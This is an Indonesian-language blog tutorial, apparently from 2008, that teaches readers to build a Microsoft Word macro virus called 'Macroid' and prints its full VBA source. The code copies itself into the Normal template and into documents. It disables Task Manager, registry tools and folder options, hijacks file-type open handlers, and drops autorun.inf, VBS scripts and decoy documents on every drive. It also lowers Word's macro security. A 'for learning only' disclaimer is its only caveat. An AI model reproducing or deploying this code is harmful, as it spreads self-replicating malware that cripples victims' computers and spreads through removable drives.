(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)
Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.
Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).
Pasti banyak bertanya kenapa kali ini Morphic membahas tentang cara membuat virus? Biasanya kan Morphic lebih sering membahas analisis virus atau antivirusnya itu….
Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.
Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..
Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.
CARA MEMBUAT VIRUS MACRO
- Buka Ms.Word (hanya contoh)
- buka tools > Macro> Visual Basic Editor
- Akan muncul gambar di bawah
Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.
Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???
Tenang, aku dah siapkan kok sourcenya. Makan neh source code!
‘This is my code’s virus
‘
‘Fuck Gates. Your software has small weakness. Watch it!
‘
‘Macro Viruses
‘[Macroid]
‘
‘Hanya untuk pembelajaran
Private Sub Document_Close()
Dim AD, NT As Object
Dim isi As String
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If AD.Name <> “Macroid” Then
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
AD.Name = “Macroid”
isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
AD.CodeModule.AddFromString isi
ActiveDocument.Save
End If
If NT.Name <> “Macroid” Then
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.Name = “Macroid”
isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
NT.CodeModule.AddFromString isi
NormalTemplate.Save
End If
If InStr(ActiveDocument.Content, “Macroid”) = 0 Then
ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″
End If
On Error Resume Next
Dim b As Object
Set b = CreateObject(“Wscript.Shell”)
b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”
b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”
b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
On Error Resume Next
Dim rog As Integer
Dim atr, vbs, Tipu(10), Trik(10) As String
For a = 66 To 90
partisi = Chr$(a)
vbs = partisi & “:\auto.vbs”
atr = partisi & “:\autorun.inf”
Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”
Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”
Tipu(3) = partisi & “:\Titip File sebentar.doc”
Tipu(4) = partisi & “:\jangan di baca.doc”
Tipu(5) = partisi & “:\buku harian.doc”
Tipu(6) = partisi & “:\cerita hangat.doc”
Tipu(7) = partisi & “:\Punya Baim.doc”
Tipu(8) = partisi & “:\Teka-teki yang baru.doc”
Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”
Tipu(10) = partisi & “:\Trik Sulap.doc”
If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then
Randomize
rog = Int(10 * Rnd) + 1
Open Tipu(rog) For Output As #1
Print #1, “”
Close #1
End If
Trik(1) = partisi & “:\Novel J.K.Rowling.doc”
Trik(2) = partisi & “:\cerita cinta.doc”
Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”
Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”
Trik(5) = partisi & “:\Kumpulan Cheat game.doc”
Trik(6) = partisi & “:\Cheat game RF.doc”
Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”
Trik(8) = partisi & “:\Goosebumps.doc”
Trik(9) = partisi & “:\FearStreet.doc”
Trik(10) = partisi & “:\R.L.Stine.doc”
If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then
Randomize
rogi = Int(10 * Rnd) + 1
Open Trik(rogi) For Output As #1
Print #1, “”
Close #1
End If
Open atr For Output As #1
Print #1, “[Autorun]“
Print #1, “shell\Open\command=wscript.exe auto.vbs”
Close #1
SetAttr atr, vbHidden + vbSystem
Open vbs For Output As #1
Print #1, “dim a”
Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Close #1
SetAttr vbs, vbHidden + vbSystem
Next a
If Dir(Environ$(“windir”) & “\Macroid.doc”) = “” Then
Dim isicrita As String
isicrita = “[Macroid] by Morphic” & vbCrLf & “Copyright(c) Medan Juli-2008″ & vbCrLf & vbCrLf & _
Chr(34) & “Ms.Word is a thing that can be used as a power to break everything…. ” & Chr(34) & vbCrLf & “(Morphic)”
Open Environ$(“windir”) & “\Macroid.doc” For Output As #1
Print #1, isicrita
Close #1
End If
If Dir(Environ$(“windir”) & “\avmc.vbs”) = “” Then
Open Environ$(“windir”) & “\avmc.vbs” For Output As #1
Print #1, “set fs = createobject(” & Chr(34) & “Scripting.FileSystemObject” & Chr(34) & “)”
Print #1, “for each FD in fs.drives”
Print #1, “if (FD.Drivetype = 1) and FD.Path <> ” & Chr(34) & “A:” & Chr(34) & ” then”
Print #1, “set tf = fs.CreateTextFile(FD.Path” & Chr(38) & Chr(34) & “\Jangan di baca.doc” & Chr(34) & “)”
Print #1, “end if”
Print #1, “Next”
Close #1
End If
ActiveDocument.Save
NormalTemplate.Save
End Sub
Private Sub Document_Open()
CommandBars(“Tools”).Controls(“Macro”).Visible = False
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
CommandBars(“Tools”).Controls(“Customize…”).Visible = False
CommandBars(“Tools”).Controls(“Options…”).Visible = False
Dim AD, NT As Object
Dim isi As String
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If AD.Name <> “Macroid” Then
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
AD.Name = “Macroid”
isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
AD.CodeModule.AddFromString isi
ActiveDocument.Save
End If
If NT.Name <> “Macroid” Then
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.Name = “Macroid”
isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
NT.CodeModule.AddFromString isi
NormalTemplate.Save
End If
If InStr(ActiveDocument.Content, “Macroid”) = 0 Then
ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″
End If
On Error Resume Next
Dim b As Object
Set b = CreateObject(“Wscript.Shell”)
b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”
b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”
b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
On Error Resume Next
Dim rog As Integer
Dim atr, vbs, Tipu(10), Trik(10) As String
For a = 66 To 90
partisi = Chr$(a)
vbs = partisi & “:\auto.vbs”
atr = partisi & “:\autorun.inf”
Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”
Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”
Tipu(3) = partisi & “:\Titip File sebentar.doc”
Tipu(4) = partisi & “:\jangan di baca.doc”
Tipu(5) = partisi & “:\buku harian.doc”
Tipu(6) = partisi & “:\cerita hangat.doc”
Tipu(7) = partisi & “:\Punya Baim.doc”
Tipu(8) = partisi & “:\Teka-teki yang baru.doc”
Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”
Tipu(10) = partisi & “:\Trik Sulap.doc”
If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then
Randomize
rog = Int(10 * Rnd) + 1
Open Tipu(rog) For Output As #1
Print #1, “”
Close #1
End If
Trik(1) = partisi & “:\Novel J.K.Rowling.doc”
Trik(2) = partisi & “:\cerita cinta.doc”
Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”
Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”
Trik(5) = partisi & “:\Kumpulan Cheat game.doc”
Trik(6) = partisi & “:\Cheat game RF.doc”
Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”
Trik(8) = partisi & “:\Goosebumps.doc”
Trik(9) = partisi & “:\FearStreet.doc”
Trik(10) = partisi & “:\R.L.Stine.doc”
If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then
Randomize
rogi = Int(10 * Rnd) + 1
Open Trik(rogi) For Output As #1
Print #1, “”
Close #1
End If
Open atr For Output As #1
Print #1, “[Autorun]“
Print #1, “shell\Open\command=wscript.exe auto.vbs”
Close #1
SetAttr atr, vbHidden + vbSystem
Open vbs For Output As #1
Print #1, “dim a”
Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Close #1
SetAttr vbs, vbHidden + vbSystem
Next a
End Sub
Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg……. Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.
EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI
Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!
Jawabannya lihat di bawah!!
By: Morphic
http://morphians.wordpress.com (My blog)
www.friendster.com/morphic (my friendster)
karta_morphic@yahoo.co.id (mail me here!)
http://morphic.4shared.com (Download file and upload virus here!)
Special thankz to:
-Both of my parents
-Both of my sisters
-All of my friends in Smansa Medan (khususnya anak-anak XII IPA 10)
-Para pejuang UMB dan SNMPTN tahun depan. (Semoga aku lulussss!!!!)
-Anak-anak Permata_SetiaBudi Medan
-MorphostLab!
